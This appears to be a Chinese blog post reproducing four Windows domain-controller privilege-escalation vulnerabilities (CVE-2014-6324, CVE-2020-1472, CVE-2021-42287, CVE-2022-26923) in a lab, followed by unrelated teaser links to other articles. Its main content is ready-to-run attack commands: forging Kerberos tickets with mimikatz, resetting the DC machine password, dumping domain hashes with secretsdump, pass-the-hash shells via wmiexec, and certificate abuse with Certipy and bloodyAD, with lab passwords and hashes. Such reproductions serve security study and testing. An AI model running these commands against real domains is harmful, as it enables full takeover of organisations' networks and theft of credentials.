windows 域控提权CVE-2014-6324CVE-2020-1472CVE-2021-42287CVE-2022-26923
一、CVE-2014-6324复现
环境:god.org域,两台主机,一台win2008域控,另一台web服务器win2008
工具:ms14-068.exe(漏洞exp) mimikatz psexec
利用条件:
1.域用户账号密码
2.获得一台主机权限(本地administrator)
复现:
获取sid号
whoami /user
获取域控制器地址
net time /domain
利用exp,生成一个高权限票据:
ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d OWA2010CN-God.god.org
生成的票据
链接域控的c盘,没导入票据之前是失败的
dir \\OWA2010CN-God.god.org\C$
使用mimikatz导入票据:
kerberos::list #查看当前会话
kerberos::pure #清空会话
kerberos::ptc "TGT_test02@test.lab.ccache" #导入票据
dir \\OWA2010CN-God.god.org\C$
使用psexec返回域控cmd的会话
psexec \\OWA2010CN-God.god.org cmd
正常来说webadmin域用户是不能登录域控的
为什么需要获得主机权限:
本地管理员提权成功后,可以导出相应的hash
域用户提权失败
二、CVE-2020-1472复现
环境:god.org域,两台主机,一台win2008域控,kali2022
工具包:
impacket-0.10.0
复现:
nbtscan -v -h 192.168.3.21
检测漏洞是否存在:
python zerologon_tester.py OWA2010CN-GOD 192.168.3.21
重置空密码:
python cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
连接后导出hash:
python secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass
WMI连接反弹:
python wmiexec.py god/administrator@192.168.3.21 -hashes ad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7
成功提权为域管理员:
三、CVE-2021-42287复现
前提:
一个域用户账号和密码
环境:god.org域,两台主机,一台win2008域控,另一台kali
工具:sam-the-admin
下载:https://github.com/WazeHell/sam-the-admin
复现:
python sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell
提权成功:
四、CVE-2022-26923复现
环境:有域 有证书服务器的win2016,kali2022,kali作为攻击机,win2016为域控
利用前提:
1.一个普通域用户账号
2.有证书服务器
环境准备:
需要用到工具包:
Certipy-main GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
impacket-0.10.0
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
bloodyAD-main
GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation Framework
impacket-0.10.0安装:
pip install impacket -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
pip install .
Certipy-main 安装:
python setup.py install
#网不好时会下载不成功,另一种方法
#将要下载的包写成1.txt
pip install -r 1.txt -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
检测证书时出现错误:
将证书服务器密钥加密换成sha-1即可
环境搭建参考链接:
CVE-2022-26923 Windows域提权漏洞 - 爱码网 (likecs.com)
复现:
在win2016新建了一个用户test
用户名:test
密码:Huawei@123
获取CA结构名和计算机名
certutil -config - -ping
或者:
net time #获取计算机名
certutil -CA#获取证书名
在kali的本地hosts中添加以下内容
192.168.85.110 l.com
192.168.85.110 WIN-SPGLPTOHACC.l.com
192.168.85.110 l-WIN-SPGLPTOHACC-CA
进行联通性测试:
ping l.com
申请证书
certipy req 'l.com/test:Huawei@123@WIN-SPGLPTOHACC.l.com' -ca l-WIN-SPGLPTOHACC-CA -template User -debug
检测证书
certipy auth -pfx test.pfx
添加用户:
python bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 addComputer pwnmachine 'CVEPassword1234*'
设置属性:
python3 bloodyAD.py -d l.com -u test -p 'Huawei@123' --host 192.168.85.110 setAttribute 'CN=pwnmachine,CN=Computers,DC=l,DC=com' dNSHostName '["WIN-SPGLPTOHACC.l.com"]'
申请证书:
certipy req 'l.com/pwnmachine$:CVEPassword1234*@192.168.85.110' -ca l-WIN-SPGLPTOHACC-CA -template Machine -dc-ip 192.168.85.110
检测证书:
certipy auth -pfx ./win-spglptohacc.pfx -dc-ip 192.168.85.110
获取所有HASH,hash使用的是上方检测证书的hash值:
python secretsdump.py 'l.com/win-spglptohacc$@WIN-SPGLPTOHACC.l.com' -hashes :dd3501bcbf236920c878aeebe2e77a6e
没有l.com/admininstrator的hash,就用aministrator的hash,利用HASH:
python wmiexec.py l.com/administrator@192.168.85.110 -hashes 53bd0647e27f1474ec38eb7920029d115bfe1f7d1415bb473eb5a99b33bc7b79
成功获取域管理员权限
相关文章:
windows 域控提权CVE-2014-6324CVE-2020-1472CVE-2021-42287CVE-2022-26923
一、CVE-2014-6324复现 环境:god.org域,两台主机,一台win2008域控,另一台web服务器win2008 工具:ms14-068.exe(漏洞exp) mimikatz psexec 利用条件: 1.域用户账号密码 2.获得一台主机权限(本地administ…...
1、JDK 安装 Java环境变量配置
jdk下载(Java8) (下载时间不同,小版本号会有变化,不影响后续安装) 官网下载地址:https://www.oracle.com/java/technologies/downloads/#java8-windows 下载完后安装 JDK 环境变量配置 Win…...
[c++]list模拟实现
目录 前言: 学习类的方式: 1 类成员变量 1.1 list成员变量 1.2 结点结构体变量 1.3 迭代器成员变量 2 默认函数——构造 2.1 结点结构体构造函数 2.2 list构造函数 2.3 迭代器构造函数 3 迭代器实现 3.1 list部分 3.2 迭代器结构体部分 3.2…...
实用的仓库管理软件有哪些,盘点2023年5大仓库管理软件!
对于做批发生意的老板或工厂老板来说,选择一款实用的仓库管理软件是至关重要的。仓库管理软件除了可以帮你降低仓库管理成本,提高经营管理的效率,还能够在手机上随时随地掌控仓库员工和商品的最新信息,与客户、供应商的订单情况能…...
透彻研究通过explain命令得到的SQL执行计划(1))
(八十二)透彻研究通过explain命令得到的SQL执行计划(1)
今天我们正式进入研究explain命令得到的SQL执行计划的内容了,只要把explain分析得到的SQL执行计划都研究透彻,完全能看懂,知道每个执行计划在底层是怎么执行的,那么后面学习SQL语句的调优就非常容易了。 首先,我们现在…...
【Linux】旋转锁 | 读写锁
在之前的线程学习中,用到的锁都是挂起等待锁,如果申请不到锁,那就会在锁中等待; 自旋锁则不大相似 文章目录1.自旋锁1.1 概念1.2 接口1.2.1 pthread_spin_init/destroy1.2.2 pthread_spin_lock1.2.3 pthread_spin_unlock2.读写锁…...
EasyExcell导出excel添加水印
EasyExcell导出excel添加水印1、添加easyExcel相关依赖2、准备基础工具类3、创建水印handler类4、创建单元测试类WriteTest.class5、测试结果1、添加easyExcel相关依赖 <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactId&…...
SpringCloud:Nacos配置管理
Nacos除了可以做注册中心,同样可以做配置管理来使用。 1.1.统一配置管理 当微服务部署的实例越来越多,达到数十、数百时,逐个修改微服务配置就会让人抓狂,而且很容易出错。我们需要一种统一配置管理方案,可以集中管理…...
正则表达式引擎NFA自动机的回溯解决方案总结
前几天线上一个项目监控信息突然报告异常,上到机器上后查看相关资源的使用情况,发现 CPU 利用率将近 100%。通过 Java 自带的线程 Dump 工具,我们导出了出问题的堆栈信息。 我们可以看到所有的堆栈都指向了一个名为 validateUrl 的方法&#…...
卷积神经网络之AlexNet
目录概述AlexNet特点激活函数sigmoid激活函数ReLu激活函数数据增强层叠池化局部相应归一化DropoutAlexnet网络结构网络结构分析AlexNet各层参数及其数量模型框架形状结构关于数据集训练学习keras代码示例概述 由于受到计算机性能的影响,虽然LeNet在图像分类中取得了…...
React中setState什么时候是同步的,什么时候是异步的?
本文内容均针对于18.x以下版本 setState 到底是同步还是异步?很多人可能都有这种经历,面试的时候面试官给了你一段代码,让你说出输出的内容,比如这样: constructor(props) {super(props);this.state {val: 0}}compo…...
优秀开源软件的类,都是怎么命名的?
日常编码中,代码的命名是个大的学问。能快速的看懂开源软件的代码结构和意图,也是一项必备的能力。 Java项目的代码结构,能够体现它的设计理念。Java采用长命名的方式来规范类的命名,能够自己表达它的主要意图。配合高级的 IDEA&…...
绘制CSP的patterns矩阵图
最近在使用FBCSP处理数据,然后就想着看看处理后的样子,用地形图的形式表现出来,但是没有符合自己需求的函数可以实现,就自己尝试的实现了一下,这里记录一下,方便以后查阅。 绘制CSP的patterns矩阵图 对数据做了FBCSP处理,但是想画一下CSP计算出来的patterns的地形图,并…...
Datatables展示数据(表格合并、日期计算、异步加载数据、分页显示、筛选过滤)
系列文章目录 datatable 自定义筛选按钮的解决方案Echarts实战案例代码(21):front-endPage的CJJTable前端分页插件ajax分页异步加载数据的解决方案 文章目录系列文章目录前言一、html容器构建1.操作按钮2.表格构建二、时间日期计算三、dataTables属性配置1.调用2.过…...
Python decimal模块的使用
Python decimal 模块Python中的浮点数默认精度是15位。Decimal对象可以表示任意精度的浮点数。getcontext函数用于获取当前的context环境,可以设置精度、舍入模式等参数。#在context中设置小数的精度 decimal.getcontext().prec 100通过字符串初始化Decimal类型的变…...
pycharm常用快捷键
编辑类: Ctrl D 复制选定的区域或行 Ctrl Y 删除选定的行 Ctrl Alt L 代码格式化 Ctrl Alt O 优化导入(去掉用不到的包导入) Ctrl 鼠标 简介/进入代码定义 Ctrl / 行注释 、取消注释 Ctrl 左方括号 快速跳到代码开头 Ctrl 右方括…...
useCallback 与 useMemo 的区别 作用
useCallback 缓存钩子函数,useMemo 缓存返回值(计算结果)。 TS声明如下:type DependencyList ReadonlyArray<any>;function useCallback<T extends (...args: any[]) > any>(callback: T, deps: DependencyList)…...
Mybatis的学习
01-mybatis传统dao开发模式 概述 mybatis有两种使用模式: ①传统dao开发模式, ②dao接口代理开发模式 ①传统dao开发模式 dao接口 dao实现子类 mapper映射文件dao实现子类来决定了dao接口的方法和mapper映射文件的statement的关系 代码实现 public class StudentDaoImpl im…...
PyTorch深度学习实战 | 计算机视觉
深度学习领域技术的飞速发展,给人们的生活带来了很大改变。例如,智能语音助手能够与人类无障碍地沟通,甚至在视频通话时可以提供实时翻译;将手机摄像头聚焦在某个物体上,该物体的相关信息就会被迅速地反馈给使用者&…...
436. 寻找右区间(2023.03.10))
力扣(LeetCode)436. 寻找右区间(2023.03.10)
给你一个区间数组 intervals ,其中 intervals[i] [starti, endi] ,且每个 starti 都 不同 。 区间 i 的 右侧区间 可以记作区间 j ,并满足 startj > endi ,且 startj 最小化 。 返回一个由每个区间 i 的 右侧区间 在 interv…...
VB.net复制Ntag213卡写入UID
本示例使用的发卡器:https://item.taobao.com/item.htm?ftt&id615391857885 一、读取旧Ntag卡的UID和数据 Private Sub Button15_Click(sender As Object, e As EventArgs) Handles Button15.Click轻松读卡技术支持:网站:Dim i, j As IntegerDim cardidhex, …...
React第五十七节 Router中RouterProvider使用详解及注意事项
前言 在 React Router v6.4 中,RouterProvider 是一个核心组件,用于提供基于数据路由(data routers)的新型路由方案。 它替代了传统的 <BrowserRouter>,支持更强大的数据加载和操作功能(如 loader 和…...
多场景 OkHttpClient 管理器 - Android 网络通信解决方案
下面是一个完整的 Android 实现,展示如何创建和管理多个 OkHttpClient 实例,分别用于长连接、普通 HTTP 请求和文件下载场景。 <?xml version"1.0" encoding"utf-8"?> <LinearLayout xmlns:android"http://schemas…...
HTML 列表、表格、表单
1 列表标签 作用:布局内容排列整齐的区域 列表分类:无序列表、有序列表、定义列表。 例如: 1.1 无序列表 标签:ul 嵌套 li,ul是无序列表,li是列表条目。 注意事项: ul 标签里面只能包裹 li…...
鸿蒙中用HarmonyOS SDK应用服务 HarmonyOS5开发一个医院查看报告小程序
一、开发环境准备 工具安装: 下载安装DevEco Studio 4.0(支持HarmonyOS 5)配置HarmonyOS SDK 5.0确保Node.js版本≥14 项目初始化: ohpm init harmony/hospital-report-app 二、核心功能模块实现 1. 报告列表…...
微软PowerBI考试 PL300-在 Power BI 中清理、转换和加载数据
微软PowerBI考试 PL300-在 Power BI 中清理、转换和加载数据 Power Query 具有大量专门帮助您清理和准备数据以供分析的功能。 您将了解如何简化复杂模型、更改数据类型、重命名对象和透视数据。 您还将了解如何分析列,以便知晓哪些列包含有价值的数据,…...
uniapp 小程序 学习(一)
利用Hbuilder 创建项目 运行到内置浏览器看效果 下载微信小程序 安装到Hbuilder 下载地址 :开发者工具默认安装 设置服务端口号 在Hbuilder中设置微信小程序 配置 找到运行设置,将微信开发者工具放入到Hbuilder中, 打开后出现 如下 bug 解…...
WPF八大法则:告别模态窗口卡顿
⚙️ 核心问题:阻塞式模态窗口的缺陷 原始代码中ShowDialog()会阻塞UI线程,导致后续逻辑无法执行: var result modalWindow.ShowDialog(); // 线程阻塞 ProcessResult(result); // 必须等待窗口关闭根本问题:…...
vue3 daterange正则踩坑
<el-form-item label"空置时间" prop"vacantTime"> <el-date-picker v-model"form.vacantTime" type"daterange" start-placeholder"开始日期" end-placeholder"结束日期" clearable :editable"fal…...
小木的算法日记-多叉树的递归/层序遍历
🌲 从二叉树到森林:一文彻底搞懂多叉树遍历的艺术 🚀 引言 你好,未来的算法大神! 在数据结构的世界里,“树”无疑是最核心、最迷人的概念之一。我们中的大多数人都是从 二叉树 开始入门的,它…...